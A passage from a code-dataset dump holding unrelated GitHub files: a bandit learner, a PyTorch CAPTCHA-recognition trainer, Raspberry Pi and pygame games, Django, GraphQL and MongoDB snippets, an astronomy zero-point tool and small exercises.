self.__choose_random()\n arm = 0\n if p < epsilon:\n arm = randrange(bandit.getNoArms())\n else:\n arm = self.actionValue.getBestArm()\n reward = bandit.pullArm(arm)\n stepsize = 1 / ( (epoch/ 50) + 1 )\n self.actionValue.updateEstimate(arm , reward, stepsize)\n\n\n def __step_reduce_epsilon(self, epsilon):\n if epsilon <= 0.3:\n return epsilon\n return epsilon - 0.1\n \n def Run(self, epoch, bandit):\n if epoch < 100:\n print(\"Minimum expected epoche is 100\")\n return\n \n epsilon = 0.9\n \n arms = bandit.getNoArms()\n self.actionValue.createRewardEstimates(arms)\n count = 1\n while count != epoch:\n self.__choose_arm(epsilon, bandit, count)\n count+=1\n if count % 300 == 0:\n epsilon = self.__step_reduce_epsilon(epsilon)\n \n def getBestEstimate(self):\n return self.actionValue.getBestArm()\n \n\n","repo_name":"ssivaguru/Reinforcement-Learning","sub_path":"learning_algorithm/epsilon_greedy.py","file_name":"epsilon_greedy.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18743713180","text":"from authcode.main2 import *\n\nnet = CNN_Network()\noptimizer = torch.optim.Adam(net.parameters(), lr=lr)\nloss = nn.MultiLabelSoftMarginLoss() # 多分类损失函数\n\n\ndef train(net, train_iter, test_iter, optimizer, loss, device, num_epochs):\n net = net.to(device)\n train_acc_list, test_acc_list, train_loss_list, test_loss_list = [], [], [], []\n flag = 0.0\n for epoch in range(num_epochs):\n train_loss, n = 0.0, 0\n for X, y in train_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_loss += l.cpu().item()\n n += y.shape[0]\n print(\"train_loss=\", train_loss)\n train_acc = get_acc(net, train_iter, device)\n test_acc = get_acc(net, test_iter, device)\n print(\"test_acc=\", test_acc)\n if epoch >= 80:\n if test_acc > flag:\n ckpt_dir = '../authcode'\n save_path = os.path.join(ckpt_dir, 'model21.pth')\n torch.save({'state_dict': net.state_dict()}, save_path)\n flag = test_acc\n train_acc_list.append(train_acc)\n test_acc_list.append(test_acc)\n\n\ndef get_acc(net, data_iter, device):\n acc_sum, n = 0, 0\n for X, y in data_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n pre1 = torch.argmax(y_hat[:, :62], dim=1)\n real1 = torch.argmax(y[:, :62], dim=1)\n pre2 = torch.argmax(y_hat[:, 62:124], dim=1)\n real2 = torch.argmax(y[:, 62:124], dim=1)\n pre3 = torch.argmax(y_hat[:, 124:186], dim=1)\n real3 = torch.argmax(y[:, 124:186], dim=1)\n pre4 = torch.argmax(y_hat[:, 186:], dim=1)\n real4 = torch.argmax(y[:, 186:], dim=1)\n pre_lable = torch.cat((pre1, pre2, pre3, pre4), 0).view(4, -1)\n real_label = torch.cat((real1, real2, real3, real4), 0).view(4, -1)\n bool_ = (pre_lable == real_label).transpose(0, 1)\n n += y.shape[0]\n for i in range(0, y.shape[0]):\n if bool_[i].int().sum().item() == 4:\n acc_sum += 1\n return acc_sum / n\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists('img/train'):\n os.mkdir('img/train')\n if not os.path.exists('img/test'):\n os.mkdir('img/test')\n\n epoch = 200\n batch_size = 256\n lr = 0.001\n\n # train_dataset = MyDataSet('./img/train')\n # train_loader = DataLoader(train_dataset, shuffle=True, batch_size=batch_size,num_workers=0)\n # test_dataset = MyDataSet('./img/test')\n # test_loader = DataLoader(test_dataset, shuffle=True, batch_size=batch_size,num_workers=0)\n\n net = CNN_Network()\n optimizer = torch.optim.Adam(net.parameters(), lr=lr)\n\n loss = 
nn.MultiLabelSoftMarginLoss()\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n train(net, train_loader, test_loader, optimizer, loss, device, epoch)","repo_name":"Alohawsq/pytorch-CAPTCHA","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4281859090","text":"import pygame\nimport random\nimport spidev\nimport time\nimport RPi.GPIO as GPIO\n\n# 버튼과 연결된 GPIO 핀 번호를 리스트로 저장\nbutton_pins = [25]\n\n# 21번 핀 설정\nGPIO.setmode(GPIO.BCM) \nGPIO.setup(21, GPIO.OUT)\nGPIO.output(21, GPIO.HIGH) # LED 켜기\n\n# 버튼 핀을 입력으로 설정\nfor pin in button_pins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# 버튼의 이전 입력 상태 저장\nprevious_input = [GPIO.LOW] * len(button_pins)\n\n# MCP3008의 SPI 버스와 CS(Chip Select) 핀 설정\nspi = spidev.SpiDev()\nspi.open(0, 0)\nspi.max_speed_hz = 1350000\nspi.mode = 0\ncs = 8\n\n# MCP3008에서 아날로그 값 읽기\ndef read_adc(adcnum):\n if adcnum < 0 or adcnum > 7:\n return -1\n r = spi.xfer2([1, (8 + adcnum) << 4, 0])\n adcout = ((r[1] & 3) << 8) + r[2]\n return adcout\n\n# 조이스틱의 초기 위치값\nx_initial = 502\ny_initial = 517\n\n# 조이스틱의 현재 위치값 계산\ndef read_joystick():\n x = read_adc(0)\n y = read_adc(1)\n x_diff = x - x_initial\n y_diff = y - y_initial\n return x_diff, y_diff\n \n# 초기화\npygame.init()\n\n# 화면 설정\nscreen_width = 640\nscreen_height = 480\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"숫자 맞추기 게임\")\n\n# 색상 설정\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# 시계 설정\nclock = pygame.time.Clock()\n\n# 글꼴 설정\nfont = pygame.font.Font(None, 30)\n\n# 게임 루프\ndef game():\n # 변수 초기화\n answer = random.randint(1, 100)\n guess = 50\n game_over = False\n\n # 게임 루프\n while not game_over:\n # 이벤트 처리\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n guess -= 1\n elif event.key == pygame.K_RIGHT:\n guess += 1\n elif event.key == pygame.K_UP:\n if guess == answer:\n display_message(\"get the right answer\")\n else:\n display_message(\"That’s a wrong answer.\")\n guess = 50\n answer = random.randint(1, 100)\n \n for i, pin in enumerate(button_pins):\n # 버튼의 현재 입력 상태\n input_state = GPIO.input(pin)\n # 버튼 입력 상태가 변경되면 출력\n if input_state != previous_input[i]:\n previous_input[i] = input_state\n if input_state == GPIO.HIGH:\n GPIO.output(21, GPIO.LOW)\n pygame.quit() \n \n # 조이스틱 값 읽어들이기\n x_diff, y_diff = read_joystick()\n if x_diff < -100:\n guess -= 1\n elif x_diff > 100:\n guess += 1\n elif y_diff < -100:\n if guess == answer:\n display_message(\"get the right answer\")\n else:\n display_message(\"That’s a wrong answer.\")\n guess = 50\n answer = random.randint(1, 100)\n \n # 화면 업데이트\n screen.fill(WHITE)\n\n # 텍스트 표시\n guess_text = \"Guess: \" + str(guess)\n label = font.render(guess_text, True, BLACK)\n screen.blit(label, (screen_width/2-50, screen_height/2-50))\n\n # 화면 업데이트\n pygame.display.update()\n\n # 초당 프레임 설정\n clock.tick(60)\n\n\n# 메시지 표시\ndef display_message(message):\n # 메시지 텍스트 표시\n text = font.render(message, True, BLACK)\n text_rect = text.get_rect(center=(screen_width/2, screen_height-30))\n screen.blit(text, text_rect)\n \n # 화면 업데이트\n pygame.display.update()\n \n # 2초 대기\n pygame.time.wait(2000)\n\n# 게임 실행\ngame()\n\n# 게임 종료시 LED 끄기\nGPIO.output(21, GPIO.LOW)\n\n# GPIO 설정 해제\nGPIO.cleanup()\n\n# 게임 
종료\npygame.quit()\n","repo_name":"cantstoptolaugh/Raspi_GPIOGameController","sub_path":"숫자 맞추기.py","file_name":"숫자 맞추기.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22174547332","text":"def nonNegativeFloatValidation(prompt, errorMessage):\n number = input(prompt)\n try:\n float_number = float(number)\n if float_number > 0:\n return float_number\n else:\n print(errorMessage)\n return nonNegativeFloatValidation(prompt, errorMessage)\n\n except Exception as ex:\n print(errorMessage)\n return nonNegativeFloatValidation(prompt, errorMessage)\n\n\ndef readOilPrices(prices, noOfCountries):\n valid_continent = ['Asia', 'Africa', 'Europe',\n 'North America', 'South America', 'Australia', 'Antarctica']\n\n for i in range(int(noOfCountries)):\n country = input(f'enter the name of country {i+1}: ')\n price = nonNegativeFloatValidation(\n f\"Enter the oil price in '{country}': \", 'The number of countries must be a positive number greater than zero. ')\n\n continent = ''\n while continent not in valid_continent:\n continent = input(\n f\"{country} is located in which continent?: \").title()\n\n prices.append(country)\n prices.append(price)\n prices.append(continent)\n\n return prices\n\n\nnum_of_countries = nonNegativeFloatValidation(\n 'Enter the number of countries: ', 'The number of countries must be a positive number greater than zero. ')\nprices = readOilPrices([], num_of_countries)\n\nprint(prices)\n\n\ndef listOilPrices(prices):\n string = ''\n\n string += f'--------------------------------------------------\\n{\"Country\":<14}{\"Oil Price\":<14}{\"Continent\":<14}\\n--------------------------------------------------'\n\n for i in range(len(prices)):\n if i % 3 == 0:\n\n string += f'\\n{prices[i]:<14}'\n else:\n string += f'{prices[i]:<14} '\n string += '\\n--------------------------------------------------'\n return string\n\n\noutput = listOilPrices(prices)\nprint(output)\n","repo_name":"mostafa-sadeghi/maryam_rahimi","sub_path":"__pycache__/past/ass2.py","file_name":"ass2.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1967915626","text":"from nonebot import on_request, RequestSession\n\nfrom config import GROUP_LIST, GROUP_ADMIN\n\n\n@on_request('group')\nasync def _(session: RequestSession):\n print(session.ctx)\n if session.ctx['group_id'] in GROUP_LIST:\n await session.approve()\n user_id = session.ctx['user_id']\n await session.send(GROUP_ADMIN + f'[CQ:at,qq={user_id}]')","repo_name":"Gensonotsuki/qqbot","sub_path":"ALLplugins/plugins/group_admin.py","file_name":"group_admin.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72774142774","text":"from asgiref.sync import async_to_sync\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\n\nfrom django.core import serializers\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n async def websocket_connect(self, event):\n print(\"CONNECTED\", event)\n\n await self.channel_layer.group_add(\n f\"notification_group_{self.scope['url_route']['kwargs']['user_id']}\",\n self.channel_name\n )\n\n await self.accept()\n \n context = await self.get_notification_info(self.scope)\n\n await self.send_json(content=context)\n\n async def websocket_disconnect(self, 
event):\n print(\"DISCONNECTED\", event)\n\n async def websocket_receive(self, event):\n print(\"RECEIVE\", event)\n await self.send(text_data='HELLO')\n\n async def notification_info(self,event):\n context = await self.get_notification_info(self.scope)\n\n await self.send_json(content=context)\n\n @database_sync_to_async\n def get_notification_info(self,scope):\n if not scope['user'].is_authenticated:\n context = {\n 'unreaded_notification_count':'',\n 'unreaded_notifications':'',\n 'old_notifications':''\n }\n return context\n\n notifications = scope['user'].notifications_assigned_to_user.order_by('-creation_date')\n old_notifications = notifications.filter(is_read=True)\n unreaded_notifications = notifications.filter(is_read=False).order_by('creation_date')\n\n context = {\n 'unreaded_notification_count':unreaded_notifications.count(),\n 'unreaded_notifications':serializers.serialize('json',unreaded_notifications),\n 'old_notifications':serializers.serialize('json',old_notifications[:3])\n }\n\n return context","repo_name":"JangasCodingplace/NotificationApplication","sub_path":"Notification/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"20119392628","text":"#!/usr/bin/env python\n\nimport sys, os\n\n_file = None\ndef svg(filename):\n global _file\n if _file:\n _file.close()\n _file = open(filename, \"wt\")\n\ndef svg2png(nm):\n os.system(\"inkscape -z -e %s.png %s.svg\" % (nm, nm))\n os.unlink(nm + \".svg\")\n\ndef p(s):\n if _file:\n _file.write(s)\n _file.write('\\n')\n else:\n sys.stdout.write(s)\n sys.stdout.write('\\n')\n\ndef start(width, height):\n p(\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<svg\n xmlns:dc=\"http://purl.org/dc/elements/1.1/\"\n xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"\n xmlns:svg=\"http://www.w3.org/2000/svg\"\n xmlns=\"http://www.w3.org/2000/svg\"\n width=\"%d\"\n height=\"%d\"\n viewBox=\"0 0 %d %d\"\n version=\"1.1\" >\n <g id=\"layer1\">\"\"\" % (width, height, width, height))\n\ndef end():\n p(\"</g></svg>\")\n\ndef ellipse(cx, cy, rx, ry, style, add = None):\n if not add:\n add = \"\"\n p(\"<ellipse style=\\\"%s\\\" cx=\\\"%f\\\" cy=\\\"%f\\\" rx=\\\"%f\\\" ry=\\\"%f\\\" %s />\" % (style, cx, cy, rx, ry, add))\n\ndef rect(x, y, width, height, ry, style, add = None):\n if not add:\n add = \"\"\n p('<rect style=\"%s\" x=\"%f\" y=\"%f\" width=\"%f\" height=\"%f\" ry=\"%f\" %s />' % (style, x, y, width, height, ry, add))\n\ndef transform(rotate = None, scale_x = None, scale_y = None, translate_x = None, translate_y = None):\n s = \"\"\n if rotate:\n if isinstance(rotate, tuple):\n a = rotate[0]\n cx = rotate[1] if len(rotate) > 1 else 0.0\n cy = rotate[2] if len(rotate) > 2 else 0.0\n s = s + \" rotate(%f %f %f)\" % (a, cx, cy)\n else:\n s = s + \" rotate(%f)\" % rotate\n if scale_x or scale_y:\n if scale_x is None:\n scale_x = 1.0\n if scale_y is None:\n scale_y = 1.0\n s = s + \" scale(%f %f)\" % (scale_x, scale_y)\n if translate_x or translate_y:\n if translate_x is None:\n translate_x = 0.0\n if translate_y is None:\n translate_y = 0.0\n s = s + \" translate(%f %f)\" % (translate_x, translate_y)\n if s:\n return 'transform=\"%s\"' % s\n else:\n return \"\"\n\ndef man(a1, a2, ah, scale_x):\n start(50, 100)\n\n translate_x = 0.0\n if scale_x < 0.96 or scale_x > 1.04:\n translate_x = 25 * (1.0 - scale_x)\n # Head:\n ellipse(25, 25, 16, 14, \"fill:#000000\", transform(rotate = 
(ah, 25, 25), scale_x = scale_x, translate_x = translate_x))\n # Body:\n ellipse(25, 55, 13, 17, \"fill:#000000\", transform(rotate = (-ah, 25, 55), scale_x = scale_x, translate_x = translate_x))\n\n # Eyes:\n ellipse(20, 25, 3, 2, \"fill:#0000ff\", transform(scale_x = scale_x, translate_x = translate_x))\n ellipse(30, 25, 3, 2, \"fill:#0000ff\", transform(scale_x = scale_x, translate_x = translate_x))\n\n # Leaps:\n ellipse(25, 35, 7, 1, \"fill:#ff5555\", transform(scale_x = scale_x, translate_x = translate_x))\n\n # Legs:\n rect(15, 65, 5, 25, 4, \"fill:#000000\", transform(scale_x = scale_x, rotate = (a1, 15, 65), translate_x = translate_x))\n rect(30, 65, 5, 25, 4, \"fill:#000000\", transform(scale_x = scale_x, rotate = (a2, 30, 65), translate_x = translate_x))\n\n # Hands:\n rect(10, 45, 5, 18, 2.5, \"fill:#000000\", transform(rotate = (a1, 20, 45), scale_x = scale_x, translate_x = translate_x))\n rect(35, 45, 5, 18, 2.5, \"fill:#000000\", transform(rotate = (a2, 45, 45), scale_x = scale_x, translate_x = translate_x))\n\n end()\n\n# Walk:\nfor i in range(5):\n svg(\"walk-%d.svg\" % i)\n man(0, -3.0 * i, i, 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 5))\n man(3.0 * i, -15, (4 - i), 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 10))\n man(15, -3.0 * (4 - i), -i, 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 15))\n man(3.0 * (4 - i), 0, (i - 4), 1.0)\n\n# Rotate:\nfor i in range(5):\n svg(\"rotate-%d.svg\" % i)\n man(0, 0, 0, 0.2 * (5.0 - i))\n\nfor i in range(6):\n svg(\"rotate-%d.svg\" % (i + 5))\n man(0, 0, 0, 0.2 * i if i > 0 else 0.1)\n\n_file.close()\n_file = None\n\nfor i in range(20):\n svg2png(\"walk-%d\" % i)\nfor i in range(11):\n svg2png(\"rotate-%d\" % i)\n\n# Generate test figure:\nsvg(\"test.svg\")\nstart(80, 80)\nrect(0, 30, 80, 20, 4, \"fill:#aa1010\")\nrect(30, 0, 20, 80, 4, \"fill:#aa1010\")\nend()\n_file.close()\n\nsvg2png(\"test\")\n\n","repo_name":"rymis/robolang","sub_path":"src/img/man_gen.py","file_name":"man_gen.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23153973640","text":"from graphql import GraphQLError\nfrom sqlalchemy.orm import load_only\n\nfrom schemas.domains import (\n\tDomains,\n\tDomainModel\n)\n\nfrom schemas.organizations import (\n\tOrganizations,\n\tOrganizationsModel\n)\n\n\n# Resolvers\ndef resolve_get_domain_by_id(self, info, **kwargs):\n\t\"\"\"Return a domain by its row ID\"\"\"\n\tgroup_id = kwargs.get('id', 1)\n\tquery = Domains.get_query(info).filter(\n\t\tDomainModel.id == group_id\n\t)\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, Invalid ID\")\n\treturn query.all()\n\n\ndef resolve_get_domain_by_domain(self, info, **kwargs):\n\t\"\"\"Return a domain by a url\"\"\"\n\tdomain = kwargs.get('url')\n\tquery = Domains.get_query(info).filter(\n\t\tDomainModel.domain == domain\n\t)\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, domain does not exist\")\n\treturn query.all()\n\n\ndef resolve_get_domain_by_organization(self, info, **kwargs):\n\t\"\"\"Return a list of domains by by their associated organization\"\"\"\n\torganization = kwargs.get('org')\n\n\torganization_id = Organizations.get_query(info).filter(\n\t\tOrganizationsModel.organization == organization\n\t).options(load_only('id'))\n\n\tif not len(organization_id.all()):\n\t\traise GraphQLError(\"Error, no organization associated with that enum\")\n\n\tquery = 
Domains.get_query(info).filter(\n\t\tDomainModel.organization_id == organization_id\n\t)\n\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, no domains associated with that organization\")\n\treturn query.all()\n","repo_name":"naeemhaq/tracker","sub_path":"api/resolvers/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"28557193720","text":"\n# Q3: Select a number. Ask the user to enter a number, output whether their number is less than or greater than\n# the selected number. Repeat this process until the user guesses the correct number.\n\n#Let i be any number used as a number for user to guess\ni = 25 \nnum=int(input(\"Guess a number: \"))\n\n#Use while loop to repeat code until a user guess the right number\nwhile num!=i:\n if num<i:\n print(\"Too low\")\n # num=int(input(\"Guess a number: \")) #added to break the while loop and to ask the user to guess the number again\n elif num>i:\n print(\"Too high\")\n num=int(input(\"Guess a number: \")) #Tab out from if statement to break the loop\nelse: num=i #Best practice to add the else \nprint(\"Correct\")\n\n","repo_name":"SheCodesAus/she-codes-python-exercises-mvmirhan","sub_path":"0_exercises/whileloops_q3.py","file_name":"whileloops_q3.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26968157017","text":"# first you have to setup MongoDB, mine in in \"C:\\mongodb\".\n# Create data file in \"C:\\data\\db\" using command \"mkdir C:\\data\\db\" in command promt.\n# Start server using command \"mongod\" in command prompt.\n\n\"\"\"..........Making a Connection with MongoClient..........\"\"\"\nfrom pymongo import MongoClient\nclient = MongoClient()\n# The above code will connect on the default host and port. We can also specify the host and port explicitly,\n# as follows:\n# client = MongoClient('localhost', 27017)\n# client = MongoClient('mongodb://localhost:27017/')\n\n\"\"\"..........Getting a Database..........\"\"\"\n# A single instance of MongoDB can support multiple independent databases. When working with PyMongo you access\n# databases using attribute style access on MongoClient instances:\ndb = client.test_database\n# If your database name is such that using attribute style access won’t work (like test-database),\n# you can use dictionary style access instead:\n# db = client['test-database']\n\n\"\"\"..........Getting a Collection..........\"\"\"\n# A collection is a group of documents stored in MongoDB, and can be thought of as roughly the equivalent of a table in\n# a relational database. Getting a collection in PyMongo works the same as getting a database:\ncollection = db.test_collection\n# or (using dictionary style access):\n# collection = db['test-collection']\n# An important note about collections (and databases) in MongoDB is that they are created lazily - none of the above\n# commands have actually performed any operations on the MongoDB server. Collections and databases are created when the\n# first document is inserted into them.\n\n\"\"\"..........Documents..........\"\"\"\n# Data in MongoDB is represented (and stored) using JSON-style documents. In PyMongo we use dictionaries to represent\n# documents. 
As an example, the following dictionary might be used to represent a blog post:\nimport datetime\npost = {\n \"author\": \"Sajid\",\n \"text\": \"My first practice with MongoDB and Python\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()\n}\n# Note that documents can contain native Python types (like datetime.datetime instances) which will be automatically\n# converted to and from the appropriate BSON types.\n\n\"\"\"..........Inserting a Document..........\"\"\"\n# To insert a document into a collection we can use the insert_one() method:\nposts = db.posts\npost_id = posts.insert_one(post).inserted_id\nprint(post_id)\n# When a document is inserted a special key, \"_id\", is automatically added if the document doesn’t already contain an\n# \"_id\" key. The value of \"_id\" must be unique across the collection. insert_one() returns an instance of\n# InsertOneResult. For more information on \"_id\", see the documentation on _id.\n# After inserting the first document, the posts collection has actually been created on the server. We can verify this\n# by listing all of the collections in our database:\nprint(db.collection_names(include_system_collections=False))\n\n\"\"\"..........Getting a Single Document With find_one()..........\"\"\"\n# The most basic type of query that can be performed in MongoDB is find_one(). This method returns a single document\n# matching a query (or None if there are no matches). It is useful when you know there is only one matching document,\n# or are only interested in the first match. Here we use find_one() to get the first document from the posts collection:\nprint(posts.find_one())\n# The result is a dictionary matching the one that we inserted previously.\n# Note: The returned document contains an \"_id\", which was automatically added on insert.\n# find_one() also supports querying on specific elements that the resulting document must match. To limit our results\n# to a document with author “Sajid” we do:\nprint(posts.find_one({\"author\": \"Sajid\"}))\n# If we try with a different author, like “Eliot”, we’ll get no result:\nprint(posts.find_one({\"author\": \"Eliot\"}))\n","repo_name":"ahmadalsajid/MongoDBPractice","sub_path":"FirstMongo.py","file_name":"FirstMongo.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36541691985","text":"import pygame as pg\nimport random\n\nMAROON = [128, 0, 0]\nBLACK = [0] * 3\nRED = [255, 0, 0]\nW, H = 500, 500\n\npg.init()\nwin = pg. 
display.set_mode((W, H))\n\nwhile 1:\n    for event in pg.event.get():\n        if event.type == pg.QUIT:\n            pg.quit()\n            exit()\n\n    for i in range(10):\n        pg.draw.circle(win, MAROON,\n                       (random.randint(0, W), random.randint(0, H)), 1)\n\n    pressed = pg.mouse.get_pressed()\n    if pressed[0]:\n        pos = pg.mouse.get_pos()\n        pg.draw.circle(win, RED, pos, 5)\n    pg.display.update()\n\n    pg.time.delay(20)","repo_name":"bulatgilfanov/pyton_study","sub_path":"les.21.py","file_name":"les.21.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39493846023","text":"from django.urls import path\nfrom watchlist_app.api import views\n\nurlpatterns = [\n    # path('list/',views.movie_list ,name = 'movie-list'),\n    # path('<int:pk>',views.movie_details ,name = 'movie-details'),\n    \n    # path('list/',views.MovieListAV.as_view() ,name = 'movie-list'),\n    # path('<int:pk>',views.MovieDetailAV.as_view() ,name = 'movie-details'),\n    path('list/',views.WatchListAV.as_view() ,name = 'movie-list'),\n    path('<int:pk>',views.WatchDetailAV.as_view() ,name = 'movie-details'),\n    path('stream/',views.StreamPlatformAV.as_view(), name ='stream'),\n    path('stream/<int:pk>',views.StreamPlatformDetailAV.as_view(), name = 'Stream-details')\n]","repo_name":"aayush162001/watchmate","sub_path":"watchlist_app/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27440905680","text":"import sys\nimport argparse\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import units\n\n\ndef get_zeropoint_info(filename, ext=0):\n    \"\"\"\n    Compute zero-point information from a fits image.\n\n    For more information about zeropoints take a look at the following links:\n    https://www.stsci.edu/hst/wfpc2/Wfpc2_dhb/wfpc2_ch52.html\n    https://www.stsci.edu/hst/instrumentation/acs/data-analysis/zeropoints\n\n    Parameters\n    ----------\n    filename : str\n        The path of the fits file image.\n\n    ext : int, optional\n        The FITS extension containing the image data. The default value is 0.\n\n    Returns\n    -------\n    zpt_dict : dict\n        A dictionary containing the zero-point information.\n        The dictionary contains the following items:\n\n        - exp_time : float\n            The exposure time\n\n        - phot_f_lam : float\n            The value of PHOTFLAM. 
This is the flux of a source with\n constant flux per unit wavelength (in erg s-1 cm-2 A-1) which\n produces a count rate of 1 count per second.\n\n - phot_p_lam : float\n the pivot wavelength (in Angstrom)\n\n - zero_point : sloat\n the zero point value\n\n - zero_point_p : float\n the zero point value plus 2.5 times log10 of the exposure time\n\n - zero_point_m : float\n the zero point value minus 2.5 times log10 of the exposure time\n\n - counts_to_flux : float\n Quantity to convert counts to flux units\n \"\"\"\n hdr = fits.getheader(filename, ext=ext)\n phot_f_lam = hdr['PHOTFLAM']\n phot_p_lam = hdr['PHOTPLAM']\n exp_time = hdr['EXPTIME']\n\n try:\n science_units = hdr['BUNIT']\n except KeyError:\n science_units = None\n\n zpt = -2.5 * np.log10(phot_f_lam) - 21.10\n zpt += -5 * np.log10(phot_p_lam) + 18.6921\n\n acs_zpt_pexp = zpt + 2.5 * np.log10(exp_time)\n acs_zpt_mexp = zpt - 2.5 * np.log10(exp_time)\n\n if science_units is not None and science_units.lower().endswith('/s'):\n counts_to_flux = phot_f_lam\n else:\n counts_to_flux = phot_f_lam/exp_time\n\n zpt_dict = {\n \"exp_time\": exp_time,\n \"phot_f_lam\": phot_f_lam,\n \"phot_p_lam\": (phot_p_lam / 10) * units.nm,\n \"zero_point\": zpt,\n \"zero_point_p\": acs_zpt_pexp,\n \"zero_point_m\": acs_zpt_mexp,\n 'counts_to_flux': counts_to_flux\n }\n return zpt_dict\n\n\ndef print_zeropoint_info(filename, ext=0):\n \"\"\"\n Print the zero-points information of a FITS image.\n\n Parameters\n ----------\n filename : str\n The path of a FITS file image.\n ext : int, optional\n The FITS extension containing the image data. The default value is 0.\n\n Returns\n -------\n None.\n\n \"\"\"\n zpt_dict = get_zeropoint_info(filename)\n print(f\"\\n{filename}\")\n s = \"Exp time: {exp_time}\\n\"\n s += \"Pivot wavelenght: {phot_p_lam:.0f}\\n\"\n s += \"Zero point: {zero_point}\\n\"\n s += \"Zero point (+m): {zero_point_p}\\n\"\n s += \"Zero point (-m): {zero_point_m}\\n\"\n print(s.format(**zpt_dict))\n\n\ndef main(options=None):\n \"\"\"\n Run the main program of this module.\n\n Returns\n -------\n None.\n\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Print zero-point ifnormatio of FITS images.'\n )\n parser.add_argument(\n 'inp_files', metavar='FITS_IMAGES', type=str, nargs='+',\n help='One or more than one fits file for which you want to view the'\n 'zero-point information'\n )\n parser.add_argument(\n '--ext', metavar='EXT', type=int, default=0,\n help='The extension containing the image data.'\n )\n\n if options is None:\n args = parser.parse_args()\n else:\n args = parser.parse_args(options)\n\n for fname in args.inp_files:\n try:\n print_zeropoint_info(fname)\n except Exception:\n print(\n f\"ERROR: Cannot read zeropoint info for file {fname}\",\n file=sys.stderr\n )\n continue\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mauritiusdadd/python-specex","sub_path":"src/specex/zeropoints.py","file_name":"zeropoints.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10955017417","text":"from typing import List\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n\n # not legal\n if len(mat) * len(mat[0]) != r * c:\n return mat\n\n asList = []\n for row in mat:\n asList.extend(row)\n print(asList)\n \n result = []\n\n for rowIdx in range(r):\n\n newRow = asList[rowIdx*c: (rowIdx*c)+c]\n print(newRow)\n result.append(newRow)\n \n return result\n\n\n\n 
","repo_name":"A7fa7fa/python-leetcode","sub_path":"0566 - reshape-the-matrix/reshape-the-matrix.py","file_name":"reshape-the-matrix.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11602059250","text":"#!/usr/bin/python\nimport sys\nimport os\nimport math\nimport csv\nimport random\nimport statistics\nimport copy\nimport logging\n\nlog = logging.getLogger(__name__)\n\n# add script folder to path for imports\nfull_path = os.path.abspath(os.path.dirname(sys.argv[0]))\nsys.path.append(full_path)\n\n\nclass GeneticAlg:\n def __init__(self, par, act, ndays):\n self.par = par\n self.act = act\n self.NDAYS = ndays\n\n\ndef randy_marsh():\n return int.from_bytes(os.urandom(4), byteorder=\"big\")\n\n# SET NUMBER OF DAYS\nactivity_max = 0\ngrouped = {}\nchr_id = 0\nDEBUG1 = True\nglobal g_w1\nglobal g_w2\n\nclass Ga_oratorio:\n def __init__(self, data=\"../data/delavnice.csv\", pop_size=20, 